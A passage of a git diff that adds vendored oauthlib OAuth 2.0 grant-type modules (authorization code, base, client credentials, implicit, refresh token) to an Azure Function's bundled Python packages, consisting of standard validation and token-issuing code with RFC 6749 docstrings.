self.validate_scopes(request) + + request_info.update({ + 'client_id': request.client_id, + 'redirect_uri': request.redirect_uri, + 'response_type': request.response_type, + 'state': request.state, + 'request': request + }) + + for validator in self.custom_validators.post_auth: + request_info.update(validator(request)) + + return request.scopes, request_info + + def validate_token_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + # REQUIRED. Value MUST be set to "authorization_code". + if request.grant_type not in ('authorization_code', 'openid'): + raise errors.UnsupportedGrantTypeError(request=request) + + for validator in self.custom_validators.pre_token: + validator(request) + + if request.code is None: + raise errors.InvalidRequestError( + description='Missing code parameter.', request=request) + + for param in ('client_id', 'grant_type', 'redirect_uri'): + if param in request.duplicate_params: + raise errors.InvalidRequestError(description='Duplicate %s parameter.' 
% param,
+                                                  request=request)
+
+        if self.request_validator.client_authentication_required(request):
+            # If the client type is confidential or the client was issued client
+            # credentials (or assigned other authentication requirements), the
+            # client MUST authenticate with the authorization server as described
+            # in Section 3.2.1.
+            # https://tools.ietf.org/html/rfc6749#section-3.2.1
+            if not self.request_validator.authenticate_client(request):
+                log.debug('Client authentication failed, %r.', request)
+                raise errors.InvalidClientError(request=request)
+        elif not self.request_validator.authenticate_client_id(request.client_id, request):
+            # REQUIRED, if the client is not authenticating with the
+            # authorization server as described in Section 3.2.1.
+            # https://tools.ietf.org/html/rfc6749#section-3.2.1
+            log.debug('Client authentication failed, %r.', request)
+            raise errors.InvalidClientError(request=request)
+
+        if not hasattr(request.client, 'client_id'):
+            raise NotImplementedError('Authenticate client must set the '
+                                      'request.client.client_id attribute '
+                                      'in authenticate_client.')
+
+        request.client_id = request.client_id or request.client.client_id
+
+        # Ensure the client is authorized to use this grant type
+        self.validate_grant_type(request)
+
+        # REQUIRED. The authorization code received from the
+        # authorization server.
+        if not self.request_validator.validate_code(request.client_id,
+                                                    request.code, request.client, request):
+            log.debug('Client, %r (%r), is not allowed access to scopes %r.',
+                      request.client_id, request.client, request.scopes)
+            raise errors.InvalidGrantError(request=request)
+
+        # OPTIONAL. Validate PKCE code_verifier
+        challenge = self.request_validator.get_code_challenge(request.code, request)
+
+        if challenge is not None:
+            if request.code_verifier is None:
+                raise errors.MissingCodeVerifierError(request=request)
+
+            challenge_method = self.request_validator.get_code_challenge_method(request.code, request)
+            if challenge_method is None:
+                raise errors.InvalidGrantError(request=request, description="Challenge method not found")
+
+            if challenge_method not in self._code_challenge_methods:
+                raise errors.ServerError(
+                    description="code_challenge_method {} is not supported.".format(challenge_method),
+                    request=request
+                )
+
+            if not self.validate_code_challenge(challenge,
+                                                challenge_method,
+                                                request.code_verifier):
+                log.debug('request provided an invalid code_verifier.')
+                raise errors.InvalidGrantError(request=request)
+        elif self.request_validator.is_pkce_required(request.client_id, request) is True:
+            if request.code_verifier is None:
+                raise errors.MissingCodeVerifierError(request=request)
+            raise errors.InvalidGrantError(request=request, description="Challenge not found")
+
+        for attr in ('user', 'scopes'):
+            if getattr(request, attr, None) is None:
+                log.debug('request.%s was not set on code validation.', attr)
+
+        # REQUIRED, if the "redirect_uri" parameter was included in the
+        # authorization request as described in Section 4.1.1, and their
+        # values MUST be identical.
+        if request.redirect_uri is None:
+            request.using_default_redirect_uri = True
+            request.redirect_uri = self.request_validator.get_default_redirect_uri(
+                request.client_id, request)
+            log.debug('Using default redirect_uri %s.', request.redirect_uri)
+            if not request.redirect_uri:
+                raise errors.MissingRedirectURIError(request=request)
+        else:
+            request.using_default_redirect_uri = False
+            log.debug('Using provided redirect_uri %s', request.redirect_uri)
+
+        if not self.request_validator.confirm_redirect_uri(request.client_id, request.code,
+                                                           request.redirect_uri, request.client,
+                                                           request):
+            log.debug('Redirect_uri (%r) invalid for client %r (%r).',
+                      request.redirect_uri, request.client_id, request.client)
+            raise errors.MismatchingRedirectURIError(request=request)
+
+        for validator in self.custom_validators.post_token:
+            validator(request)
+
+    def validate_code_challenge(self, challenge, challenge_method, verifier):
+        if challenge_method in self._code_challenge_methods:
+            return self._code_challenge_methods[challenge_method](verifier, challenge)
+        raise NotImplementedError('Unknown challenge_method %s' % challenge_method)
+
+    def _create_cors_headers(self, request):
+        """If CORS is allowed, create the appropriate headers."""
+        if 'origin' not in request.headers:
+            return {}
+
+        origin = request.headers['origin']
+        if not is_secure_transport(origin):
+            log.debug('Origin "%s" is not HTTPS, CORS not allowed.', origin)
+            return {}
+        elif not self.request_validator.is_origin_allowed(
+            request.client_id, origin, request):
+            log.debug('Invalid origin "%s", CORS not allowed.', origin)
+            return {}
+        else:
+            log.debug('Valid origin "%s", injecting CORS headers.', origin)
+            return {'Access-Control-Allow-Origin': origin}
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/base.py
new file mode 100644
index 0000000..b2c1014
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/base.py
@@ -0,0 +1,250 @@
+"""
+oauthlib.oauth2.rfc6749.grant_types
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+"""
+import logging
+from itertools import chain
+
+from oauthlib.common import add_params_to_uri
+from oauthlib.oauth2.rfc6749 import errors, utils
+from oauthlib.uri_validate import is_absolute_uri
+
+from ..request_validator import RequestValidator
+
+log = logging.getLogger(__name__)
+
+
+class ValidatorsContainer:
+    """
+    Container object for holding custom validator callables to be invoked
+    as part of the grant type `validate_authorization_request()` or
+    `validate_token_request()` methods on the various grant types.
+
+    Authorization validators must be callables that take a request object and
+    return a dict, which may contain items to be added to the `request_info`
+    returned from the grant_type after validation.
+
+    Token validators must be callables that take a request object and
+    return None.
+
+    Both authorization validators and token validators may raise OAuth2
+    exceptions if validation conditions fail.
+ + Authorization validators added to `pre_auth` will be run BEFORE + the standard validations (but after the critical ones that raise + fatal errors) as part of `validate_authorization_request()` + + Authorization validators added to `post_auth` will be run AFTER + the standard validations as part of `validate_authorization_request()` + + Token validators added to `pre_token` will be run BEFORE + the standard validations as part of `validate_token_request()` + + Token validators added to `post_token` will be run AFTER + the standard validations as part of `validate_token_request()` + + For example: + + >>> def my_auth_validator(request): + ... return {'myval': True} + >>> auth_code_grant = AuthorizationCodeGrant(request_validator) + >>> auth_code_grant.custom_validators.pre_auth.append(my_auth_validator) + >>> def my_token_validator(request): + ... if not request.everything_okay: + ... raise errors.OAuth2Error("uh-oh") + >>> auth_code_grant.custom_validators.post_token.append(my_token_validator) + """ + + def __init__(self, post_auth, post_token, + pre_auth, pre_token): + self.pre_auth = pre_auth + self.post_auth = post_auth + self.pre_token = pre_token + self.post_token = post_token + + @property + def all_pre(self): + return chain(self.pre_auth, self.pre_token) + + @property + def all_post(self): + return chain(self.post_auth, self.post_token) + + +class GrantTypeBase: + error_uri = None + request_validator = None + default_response_mode = 'fragment' + refresh_token = True + response_types = ['code'] + + def __init__(self, request_validator=None, **kwargs): + self.request_validator = request_validator or RequestValidator() + + # Transforms class variables into instance variables: + self.response_types = self.response_types + self.refresh_token = self.refresh_token + self._setup_custom_validators(kwargs) + self._code_modifiers = [] + self._token_modifiers = [] + + for kw, val in kwargs.items(): + setattr(self, kw, val) + + def _setup_custom_validators(self, kwargs): + post_auth = kwargs.get('post_auth', []) + post_token = kwargs.get('post_token', []) + pre_auth = kwargs.get('pre_auth', []) + pre_token = kwargs.get('pre_token', []) + if not hasattr(self, 'validate_authorization_request'): + if post_auth or pre_auth: + msg = ("{} does not support authorization validators. Use " + "token validators instead.").format(self.__class__.__name__) + raise ValueError(msg) + # Using tuples here because they can't be appended to: + post_auth, pre_auth = (), () + self.custom_validators = ValidatorsContainer(post_auth, post_token, + pre_auth, pre_token) + + def register_response_type(self, response_type): + self.response_types.append(response_type) + + def register_code_modifier(self, modifier): + self._code_modifiers.append(modifier) + + def register_token_modifier(self, modifier): + self._token_modifiers.append(modifier) + + def create_authorization_response(self, request, token_handler): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + """ + raise NotImplementedError('Subclasses must implement this method.') + + def create_token_response(self, request, token_handler): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. 
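+
+        A subclass supplies the actual behaviour; as a rough editorial
+        sketch only (assuming ``json`` is imported, which this base
+        module does not do)::
+
+            class MyGrant(GrantTypeBase):
+                def create_token_response(self, request, token_handler):
+                    headers = self._get_default_headers()
+                    token = token_handler.create_token(request, refresh_token=False)
+                    self.request_validator.save_token(token, request)
+                    return headers, json.dumps(token), 200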
+ """ + raise NotImplementedError('Subclasses must implement this method.') + + def add_token(self, token, token_handler, request): + """ + :param token: + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + # Only add a hybrid access token on auth step if asked for + if not request.response_type in ["token", "code token", "id_token token", "code id_token token"]: + return token + + token.update(token_handler.create_token(request, refresh_token=False)) + return token + + def validate_grant_type(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + client_id = getattr(request, 'client_id', None) + if not self.request_validator.validate_grant_type(client_id, + request.grant_type, request.client, request): + log.debug('Unauthorized from %r (%r) access to grant type %s.', + request.client_id, request.client, request.grant_type) + raise errors.UnauthorizedClientError(request=request) + + def validate_scopes(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + if not request.scopes: + request.scopes = utils.scope_to_list(request.scope) or utils.scope_to_list( + self.request_validator.get_default_scopes(request.client_id, request)) + log.debug('Validating access to scopes %r for client %r (%r).', + request.scopes, request.client_id, request.client) + if not self.request_validator.validate_scopes(request.client_id, + request.scopes, request.client, request): + raise errors.InvalidScopeError(request=request) + + def prepare_authorization_response(self, request, token, headers, body, status): + """Place token according to response mode. + + Base classes can define a default response mode for their authorization + response by overriding the static `default_response_mode` member. + + :param request: OAuthlib request. 
+ :type request: oauthlib.common.Request + :param token: + :param headers: + :param body: + :param status: + """ + request.response_mode = request.response_mode or self.default_response_mode + + if request.response_mode not in ('query', 'fragment'): + log.debug('Overriding invalid response mode %s with %s', + request.response_mode, self.default_response_mode) + request.response_mode = self.default_response_mode + + token_items = token.items() + + if request.response_type == 'none': + state = token.get('state', None) + if state: + token_items = [('state', state)] + else: + token_items = [] + + if request.response_mode == 'query': + headers['Location'] = add_params_to_uri( + request.redirect_uri, token_items, fragment=False) + return headers, body, status + + if request.response_mode == 'fragment': + headers['Location'] = add_params_to_uri( + request.redirect_uri, token_items, fragment=True) + return headers, body, status + + raise NotImplementedError( + 'Subclasses must set a valid default_response_mode') + + def _get_default_headers(self): + """Create default headers for grant responses.""" + return { + 'Content-Type': 'application/json', + 'Cache-Control': 'no-store', + 'Pragma': 'no-cache', + } + + def _handle_redirects(self, request): + if request.redirect_uri is not None: + request.using_default_redirect_uri = False + log.debug('Using provided redirect_uri %s', request.redirect_uri) + if not is_absolute_uri(request.redirect_uri): + raise errors.InvalidRedirectURIError(request=request) + + # The authorization server MUST verify that the redirection URI + # to which it will redirect the access token matches a + # redirection URI registered by the client as described in + # Section 3.1.2. + # https://tools.ietf.org/html/rfc6749#section-3.1.2 + if not self.request_validator.validate_redirect_uri( + request.client_id, request.redirect_uri, request): + raise errors.MismatchingRedirectURIError(request=request) + else: + request.redirect_uri = self.request_validator.get_default_redirect_uri( + request.client_id, request) + request.using_default_redirect_uri = True + log.debug('Using default redirect_uri %s.', request.redirect_uri) + if not request.redirect_uri: + raise errors.MissingRedirectURIError(request=request) + if not is_absolute_uri(request.redirect_uri): + raise errors.InvalidRedirectURIError(request=request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py new file mode 100644 index 0000000..83db148 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py @@ -0,0 +1,123 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import json +import logging + +from .. import errors +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class ClientCredentialsGrant(GrantTypeBase): + + """`Client Credentials Grant`_ + + The client can request an access token using only its client + credentials (or other supported means of authentication) when the + client is requesting access to the protected resources under its + control, or those of another resource owner that have been previously + arranged with the authorization server (the method of which is beyond + the scope of this specification). 
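+
+    As an editorial aside, the client side of this exchange (shown here
+    with requests-oauthlib, a separate package; the URL and credentials
+    are placeholders) typically looks like::
+
+        from oauthlib.oauth2 import BackendApplicationClient
+        from requests_oauthlib import OAuth2Session
+
+        client = BackendApplicationClient(client_id='my_client_id')
+        session = OAuth2Session(client=client)
+        token = session.fetch_token('https://provider.example/token',
+                                    client_secret='my_secret')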
+
+    The client credentials grant type MUST only be used by confidential
+    clients::
+
+        +---------+                                  +---------------+
+        |         |                                  |               |
+        |         |>--(A)- Client Authentication --->| Authorization |
+        | Client  |                                  |     Server    |
+        |         |<--(B)---- Access Token ---------<|               |
+        |         |                                  |               |
+        +---------+                                  +---------------+
+
+                        Figure 6: Client Credentials Flow
+
+    The flow illustrated in Figure 6 includes the following steps:
+
+    (A)  The client authenticates with the authorization server and
+         requests an access token from the token endpoint.
+
+    (B)  The authorization server authenticates the client, and if valid,
+         issues an access token.
+
+    .. _`Client Credentials Grant`: https://tools.ietf.org/html/rfc6749#section-4.4
+    """
+
+    def create_token_response(self, request, token_handler):
+        """Return token or error in JSON format.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :param token_handler: A token handler instance, for example of type
+                              oauthlib.oauth2.BearerToken.
+
+        If the access token request is valid and authorized, the
+        authorization server issues an access token as described in
+        `Section 5.1`_. A refresh token SHOULD NOT be included. If the request
+        failed client authentication or is invalid, the authorization server
+        returns an error response as described in `Section 5.2`_.
+
+        .. _`Section 5.1`: https://tools.ietf.org/html/rfc6749#section-5.1
+        .. _`Section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2
+        """
+        headers = self._get_default_headers()
+        try:
+            log.debug('Validating access token request, %r.', request)
+            self.validate_token_request(request)
+        except errors.OAuth2Error as e:
+            log.debug('Client error in token request. %s.', e)
+            headers.update(e.headers)
+            return headers, e.json, e.status_code
+
+        token = token_handler.create_token(request, refresh_token=False)
+
+        for modifier in self._token_modifiers:
+            token = modifier(token)
+
+        self.request_validator.save_token(token, request)
+
+        log.debug('Issuing token to client id %r (%r), %r.',
+                  request.client_id, request.client, token)
+        return headers, json.dumps(token), 200
+
+    def validate_token_request(self, request):
+        """
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        """
+        for validator in self.custom_validators.pre_token:
+            validator(request)
+
+        if not getattr(request, 'grant_type', None):
+            raise errors.InvalidRequestError('Request is missing grant type.',
+                                             request=request)
+
+        if request.grant_type != 'client_credentials':
+            raise errors.UnsupportedGrantTypeError(request=request)
+
+        for param in ('grant_type', 'scope'):
+            if param in request.duplicate_params:
+                raise errors.InvalidRequestError(description='Duplicate %s parameter.'
% param, + request=request) + + log.debug('Authenticating client, %r.', request) + if not self.request_validator.authenticate_client(request): + log.debug('Client authentication failed, %r.', request) + raise errors.InvalidClientError(request=request) + else: + if not hasattr(request.client, 'client_id'): + raise NotImplementedError('Authenticate client must set the ' + 'request.client.client_id attribute ' + 'in authenticate_client.') + # Ensure client is authorized use of this grant type + self.validate_grant_type(request) + + request.client_id = request.client_id or request.client.client_id + log.debug('Authorizing access to client %r.', request.client_id) + self.validate_scopes(request) + + for validator in self.custom_validators.post_token: + validator(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/implicit.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/implicit.py new file mode 100644 index 0000000..74bc7cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/implicit.py @@ -0,0 +1,376 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +from oauthlib import common + +from .. import errors +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class ImplicitGrant(GrantTypeBase): + + """`Implicit Grant`_ + + The implicit grant type is used to obtain access tokens (it does not + support the issuance of refresh tokens) and is optimized for public + clients known to operate a particular redirection URI. These clients + are typically implemented in a browser using a scripting language + such as JavaScript. + + Unlike the authorization code grant type, in which the client makes + separate requests for authorization and for an access token, the + client receives the access token as the result of the authorization + request. + + The implicit grant type does not include client authentication, and + relies on the presence of the resource owner and the registration of + the redirection URI. Because the access token is encoded into the + redirection URI, it may be exposed to the resource owner and other + applications residing on the same device:: + + +----------+ + | Resource | + | Owner | + | | + +----------+ + ^ + | + (B) + +----|-----+ Client Identifier +---------------+ + | -+----(A)-- & Redirection URI --->| | + | User- | | Authorization | + | Agent -|----(B)-- User authenticates -->| Server | + | | | | + | |<---(C)--- Redirection URI ----<| | + | | with Access Token +---------------+ + | | in Fragment + | | +---------------+ + | |----(D)--- Redirection URI ---->| Web-Hosted | + | | without Fragment | Client | + | | | Resource | + | (F) |<---(E)------- Script ---------<| | + | | +---------------+ + +-|--------+ + | | + (A) (G) Access Token + | | + ^ v + +---------+ + | | + | Client | + | | + +---------+ + + Note: The lines illustrating steps (A) and (B) are broken into two + parts as they pass through the user-agent. + + Figure 4: Implicit Grant Flow + + The flow illustrated in Figure 4 includes the following steps: + + (A) The client initiates the flow by directing the resource owner's + user-agent to the authorization endpoint. 
The client includes + its client identifier, requested scope, local state, and a + redirection URI to which the authorization server will send the + user-agent back once access is granted (or denied). + + (B) The authorization server authenticates the resource owner (via + the user-agent) and establishes whether the resource owner + grants or denies the client's access request. + + (C) Assuming the resource owner grants access, the authorization + server redirects the user-agent back to the client using the + redirection URI provided earlier. The redirection URI includes + the access token in the URI fragment. + + (D) The user-agent follows the redirection instructions by making a + request to the web-hosted client resource (which does not + include the fragment per [RFC2616]). The user-agent retains the + fragment information locally. + + (E) The web-hosted client resource returns a web page (typically an + HTML document with an embedded script) capable of accessing the + full redirection URI including the fragment retained by the + user-agent, and extracting the access token (and other + parameters) contained in the fragment. + + (F) The user-agent executes the script provided by the web-hosted + client resource locally, which extracts the access token. + + (G) The user-agent passes the access token to the client. + + See `Section 10.3`_ and `Section 10.16`_ for important security considerations + when using the implicit grant. + + .. _`Implicit Grant`: https://tools.ietf.org/html/rfc6749#section-4.2 + .. _`Section 10.3`: https://tools.ietf.org/html/rfc6749#section-10.3 + .. _`Section 10.16`: https://tools.ietf.org/html/rfc6749#section-10.16 + """ + + response_types = ['token'] + grant_allows_refresh_token = False + + def create_authorization_response(self, request, token_handler): + """Create an authorization response. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + The client constructs the request URI by adding the following + parameters to the query component of the authorization endpoint URI + using the "application/x-www-form-urlencoded" format, per `Appendix B`_: + + response_type + REQUIRED. Value MUST be set to "token" for standard OAuth2 implicit flow + or "id_token token" or just "id_token" for OIDC implicit flow + + client_id + REQUIRED. The client identifier as described in `Section 2.2`_. + + redirect_uri + OPTIONAL. As described in `Section 3.1.2`_. + + scope + OPTIONAL. The scope of the access request as described by + `Section 3.3`_. + + state + RECOMMENDED. An opaque value used by the client to maintain + state between the request and callback. The authorization + server includes this value when redirecting the user-agent back + to the client. The parameter SHOULD be used for preventing + cross-site request forgery as described in `Section 10.12`_. + + The authorization server validates the request to ensure that all + required parameters are present and valid. The authorization server + MUST verify that the redirection URI to which it will redirect the + access token matches a redirection URI registered by the client as + described in `Section 3.1.2`_. + + .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2 + .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. 
_`Section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12 + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + """ + return self.create_token_response(request, token_handler) + + def create_token_response(self, request, token_handler): + """Return token or error embedded in the URI fragment. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + If the resource owner grants the access request, the authorization + server issues an access token and delivers it to the client by adding + the following parameters to the fragment component of the redirection + URI using the "application/x-www-form-urlencoded" format, per + `Appendix B`_: + + access_token + REQUIRED. The access token issued by the authorization server. + + token_type + REQUIRED. The type of the token issued as described in + `Section 7.1`_. Value is case insensitive. + + expires_in + RECOMMENDED. The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + + scope + OPTIONAL, if identical to the scope requested by the client; + otherwise, REQUIRED. The scope of the access token as + described by `Section 3.3`_. + + state + REQUIRED if the "state" parameter was present in the client + authorization request. The exact value received from the + client. + + The authorization server MUST NOT issue a refresh token. + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 7.1`: https://tools.ietf.org/html/rfc6749#section-7.1 + """ + try: + self.validate_token_request(request) + + # If the request fails due to a missing, invalid, or mismatching + # redirection URI, or if the client identifier is missing or invalid, + # the authorization server SHOULD inform the resource owner of the + # error and MUST NOT automatically redirect the user-agent to the + # invalid redirection URI. + except errors.FatalClientError as e: + log.debug('Fatal client error during validation of %r. %r.', + request, e) + raise + + # If the resource owner denies the access request or if the request + # fails for reasons other than a missing or invalid redirection URI, + # the authorization server informs the client by adding the following + # parameters to the fragment component of the redirection URI using the + # "application/x-www-form-urlencoded" format, per Appendix B: + # https://tools.ietf.org/html/rfc6749#appendix-B + except errors.OAuth2Error as e: + log.debug('Client error during validation of %r. %r.', request, e) + return {'Location': common.add_params_to_uri(request.redirect_uri, e.twotuples, + fragment=True)}, None, 302 + + # In OIDC implicit flow it is possible to have a request_type that does not include the access_token! 
+ # "id_token token" - return the access token and the id token + # "id_token" - don't return the access token + if "token" in request.response_type.split(): + token = token_handler.create_token(request, refresh_token=False) + else: + token = {} + + if request.state is not None: + token['state'] = request.state + + for modifier in self._token_modifiers: + token = modifier(token, token_handler, request) + + # In OIDC implicit flow it is possible to have a request_type that does + # not include the access_token! In this case there is no need to save a token. + if "token" in request.response_type.split(): + self.request_validator.save_token(token, request) + + return self.prepare_authorization_response( + request, token, {}, None, 302) + + def validate_authorization_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + return self.validate_token_request(request) + + def validate_token_request(self, request): + """Check the token request for normal and fatal errors. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + This method is very similar to validate_authorization_request in + the AuthorizationCodeGrant but differ in a few subtle areas. + + A normal error could be a missing response_type parameter or the client + attempting to access scope it is not allowed to ask authorization for. + Normal errors can safely be included in the redirection URI and + sent back to the client. + + Fatal errors occur when the client_id or redirect_uri is invalid or + missing. These must be caught by the provider and handled, how this + is done is outside of the scope of OAuthLib but showing an error + page describing the issue is a good idea. + """ + + # First check for fatal errors + + # If the request fails due to a missing, invalid, or mismatching + # redirection URI, or if the client identifier is missing or invalid, + # the authorization server SHOULD inform the resource owner of the + # error and MUST NOT automatically redirect the user-agent to the + # invalid redirection URI. + + # First check duplicate parameters + for param in ('client_id', 'response_type', 'redirect_uri', 'scope', 'state'): + try: + duplicate_params = request.duplicate_params + except ValueError: + raise errors.InvalidRequestFatalError(description='Unable to parse query string', request=request) + if param in duplicate_params: + raise errors.InvalidRequestFatalError(description='Duplicate %s parameter.' % param, request=request) + + # REQUIRED. The client identifier as described in Section 2.2. + # https://tools.ietf.org/html/rfc6749#section-2.2 + if not request.client_id: + raise errors.MissingClientIdError(request=request) + + if not self.request_validator.validate_client_id(request.client_id, request): + raise errors.InvalidClientIdError(request=request) + + # OPTIONAL. As described in Section 3.1.2. + # https://tools.ietf.org/html/rfc6749#section-3.1.2 + self._handle_redirects(request) + + # Then check for normal errors. + + request_info = self._run_custom_validators(request, + self.custom_validators.all_pre) + + # If the resource owner denies the access request or if the request + # fails for reasons other than a missing or invalid redirection URI, + # the authorization server informs the client by adding the following + # parameters to the fragment component of the redirection URI using the + # "application/x-www-form-urlencoded" format, per Appendix B. 
+ # https://tools.ietf.org/html/rfc6749#appendix-B + + # Note that the correct parameters to be added are automatically + # populated through the use of specific exceptions + + # REQUIRED. + if request.response_type is None: + raise errors.MissingResponseTypeError(request=request) + # Value MUST be one of our registered types: "token" by default or if using OIDC "id_token" or "id_token token" + elif not set(request.response_type.split()).issubset(self.response_types): + raise errors.UnsupportedResponseTypeError(request=request) + + log.debug('Validating use of response_type token for client %r (%r).', + request.client_id, request.client) + if not self.request_validator.validate_response_type(request.client_id, + request.response_type, + request.client, request): + + log.debug('Client %s is not authorized to use response_type %s.', + request.client_id, request.response_type) + raise errors.UnauthorizedClientError(request=request) + + # OPTIONAL. The scope of the access request as described by Section 3.3 + # https://tools.ietf.org/html/rfc6749#section-3.3 + self.validate_scopes(request) + + request_info.update({ + 'client_id': request.client_id, + 'redirect_uri': request.redirect_uri, + 'response_type': request.response_type, + 'state': request.state, + 'request': request, + }) + + request_info = self._run_custom_validators( + request, + self.custom_validators.all_post, + request_info + ) + + return request.scopes, request_info + + def _run_custom_validators(self, + request, + validations, + request_info=None): + # Make a copy so we don't modify the existing request_info dict + request_info = {} if request_info is None else request_info.copy() + # For implicit grant, auth_validators and token_validators are + # basically equivalent since the token is returned from the + # authorization endpoint. + for validator in validations: + result = validator(request) + if result is not None: + request_info.update(result) + return request_info diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/refresh_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/refresh_token.py new file mode 100644 index 0000000..4beee1a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/refresh_token.py @@ -0,0 +1,135 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import json +import logging + +from .. import errors, utils +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class RefreshTokenGrant(GrantTypeBase): + + """`Refresh token grant`_ + + .. _`Refresh token grant`: https://tools.ietf.org/html/rfc6749#section-6 + """ + + def __init__(self, request_validator=None, + issue_new_refresh_tokens=True, + **kwargs): + super().__init__( + request_validator, + issue_new_refresh_tokens=issue_new_refresh_tokens, + **kwargs) + + def create_token_response(self, request, token_handler): + """Create a new access token from a refresh_token. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + If valid and authorized, the authorization server issues an access + token as described in `Section 5.1`_. 
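+
+        For reference, a successful refresh produces the ordinary JSON token
+        response of `Section 5.1`_; the values below follow the RFC's own
+        example and are purely illustrative:
+
+        .. code-block:: http
+
+            HTTP/1.1 200 OK
+            Content-Type: application/json
+            Cache-Control: no-store
+
+            {
+                "access_token": "2YotnFZFEjr1zCsicMWpAA",
+                "token_type": "Bearer",
+                "expires_in": 3600,
+                "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA"
+            }
+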
If the request failed + verification or is invalid, the authorization server returns an error + response as described in `Section 5.2`_. + + The authorization server MAY issue a new refresh token, in which case + the client MUST discard the old refresh token and replace it with the + new refresh token. The authorization server MAY revoke the old + refresh token after issuing a new refresh token to the client. If a + new refresh token is issued, the refresh token scope MUST be + identical to that of the refresh token included by the client in the + request. + + .. _`Section 5.1`: https://tools.ietf.org/html/rfc6749#section-5.1 + .. _`Section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2 + """ + headers = self._get_default_headers() + try: + log.debug('Validating refresh token request, %r.', request) + self.validate_token_request(request) + except errors.OAuth2Error as e: + log.debug('Client error in token request, %s.', e) + headers.update(e.headers) + return headers, e.json, e.status_code + + token = token_handler.create_token(request, + refresh_token=self.issue_new_refresh_tokens) + + for modifier in self._token_modifiers: + token = modifier(token, token_handler, request) + + self.request_validator.save_token(token, request) + + log.debug('Issuing new token to client id %r (%r), %r.', + request.client_id, request.client, token) + return headers, json.dumps(token), 200 + + def validate_token_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + # REQUIRED. Value MUST be set to "refresh_token". + if request.grant_type != 'refresh_token': + raise errors.UnsupportedGrantTypeError(request=request) + + for validator in self.custom_validators.pre_token: + validator(request) + + if request.refresh_token is None: + raise errors.InvalidRequestError( + description='Missing refresh token parameter.', + request=request) + + # Because refresh tokens are typically long-lasting credentials used to + # request additional access tokens, the refresh token is bound to the + # client to which it was issued. If the client type is confidential or + # the client was issued client credentials (or assigned other + # authentication requirements), the client MUST authenticate with the + # authorization server as described in Section 3.2.1. + # https://tools.ietf.org/html/rfc6749#section-3.2.1 + if self.request_validator.client_authentication_required(request): + log.debug('Authenticating client, %r.', request) + if not self.request_validator.authenticate_client(request): + log.debug('Invalid client (%r), denying access.', request) + raise errors.InvalidClientError(request=request) + elif not self.request_validator.authenticate_client_id(request.client_id, request): + log.debug('Client authentication 